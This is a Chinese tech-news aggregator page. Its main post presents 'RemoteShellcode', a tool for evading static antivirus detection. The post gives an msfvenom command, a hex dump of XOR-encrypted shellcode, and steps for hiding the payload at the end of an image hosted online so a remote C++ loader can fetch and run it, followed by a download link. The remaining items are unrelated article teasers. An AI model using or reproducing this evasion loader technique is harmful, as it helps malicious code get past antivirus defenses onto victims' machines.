news 2026/7/3 0:10:19

采用分离加载文件的方式实现静态免杀,从而降低静态检测风险

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
采用分离加载文件的方式实现静态免杀,从而降低静态检测风险

工具介绍

RemoteShellcode采用分离加载文件的方式实现静态免杀,从而降低静态检测风险

工具使用

通过命令生成一段弹计算器的shellcode

msfvenom -p windows/x64/exec cmd=calc.exe -f python

接着用EncryptedShellcode.py进行xor的加密

再把结果转换为十六进制
a8 20 ea 97 99 9b a1 78 6f 72 2a 34 38 04 3a 38 25 21 42 b3 1d 27 f9 39 05 31 df 3a 71 3b e2 21 41 30 e4 00 3b 2d 76 e3 22 23 3e 58 ba 29 49 af de 57 04 05 56 44 49 32 a8 ba 6c 39 6e b3 89 88 2b 15 39 21 f8 3b 53 ea 3a 53 3a 6a b5 f2 d4 e0 69 73 69 3b e4 b8 1b 15 23 64 a9 04 e3 21 6b 2d f8 21 58 26 73 bb 86 2f 1c 97 a0 32 e2 47 e9 30 6e a4 26 54 b0 1c 59 a9 df 28 b2 a8 75 2e 73 aa 5d 99 21 99 25 70 25 57 69 3d 56 a3 1e bd 21 10 e3 29 57 20 72 b1 1e 2e f9 67 2d 3d df 28 75 3a 68 a3 20 f3 6b fa 23 64 a9 15 30 28 2b 37 2a 3b 39 37 33 32 24 23 1c eb 85 53 28 21 9e 98 37 33 32 3f 31 df 7a 80 24 96 8c 9e 25 27 c8 6a 65 79 54 68 69 73 69 3b ec f5 6e 73 6b 65 38 ee 59 e2 1c ee 8c b4 c3 9f c7 c9 33 38 ee ce fc ce f4 8c b4 30 ec b6 43 59 7f 28 62 e9 88 89 06 64 c3 28 61 19 0a 13 54 31 28 fa b3 8c b4 1b 0e 1e 08 4b 1c 2c 0d 69
用010editor工具导入到某张图片的末尾

最后再把生成的图片放到某个网站下面

用RemoteLoader.cpp替换url编译运行,成功弹窗

工具下载

https://github.com/qifengli313-dotcom/RemoteShellcode
版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/6/30 23:08:22

SSM线上学习系统8e88w(程序+源码+数据库+调试部署+开发环境)带论文文档1万字以上,文末可获取,系统界面在最后面

系统程序文件列表系统项目功能:学院,课程,教师,学生,课程信息,学习记录SSM线上学习系统开题报告一、课题背景与意义1.1 课题背景在“互联网教育”政策推动下,线上学习已成为教育模式的重要组成部分。然而当前部分线上学习工具存在功能单一、数据割裂等问…

作者头像 李华
网站建设 2026/7/2 15:12:30

深度解析:MindsDB与ChromaDB向量数据库集成的高效实战指南

深度解析:MindsDB与ChromaDB向量数据库集成的高效实战指南 【免费下载链接】mindsdb mindsdb/mindsdb: 是一个基于 SQLite 数据库的分布式数据库管理系统,它支持多种数据存储方式,包括 SQL 和 NoSQL。适合用于构建分布式数据库管理系统&#…

作者头像 李华
网站建设 2026/7/2 8:07:30

32、深入了解Samba与Linux安全策略

深入了解Samba与Linux安全策略 在当今复杂的网络环境中,无论是实现不同操作系统间的资源共享,还是保障系统的安全性,都是至关重要的任务。Samba作为实现Linux与Windows系统资源共享的关键工具,以及Linux系统安全策略的制定与实施,对于系统的稳定运行和数据安全起着举足轻…

作者头像 李华
网站建设 2026/7/1 19:10:50

26、调试 Shell 程序的实用方法

调试 Shell 程序的实用方法 在编程过程中,调试是不可或缺的环节。对于使用 bash 进行 UNIX 编程的开发者来说,虽然 bash 具备丰富的特性和控制结构,但缺乏像 C 和 C++ 那样强大且集成的编程支持工具。不过,bash 自身也提供了一些实用的调试功能,下面将详细介绍。 基本调…

作者头像 李华
网站建设 2026/7/1 19:51:29

Symbolic 英文单词学习

1️、基本信息单词:symbolic词性:形容词发音: 🇺🇸 /sɪmˈbɑː.lɪk/🇬🇧 /sɪmˈbɒl.ɪk/词源: 来自希腊语 symbolikos(象征的、符号的),由 s…

作者头像 李华
网站建设 2026/6/30 10:59:58

AI开发全流程工具链:从编码辅助到模型部署的实战指南

在AI开发的浪潮中,工具链已成为效率与质量的决定性因素。本文将系统拆解现代AI开发全流程,涵盖智能编码、数据处理、模型训练、评估部署五大环节,通过5个核心工具、12段实战代码、8个mermaid流程图、15个Prompt示例和6组对比图表,…

作者头像 李华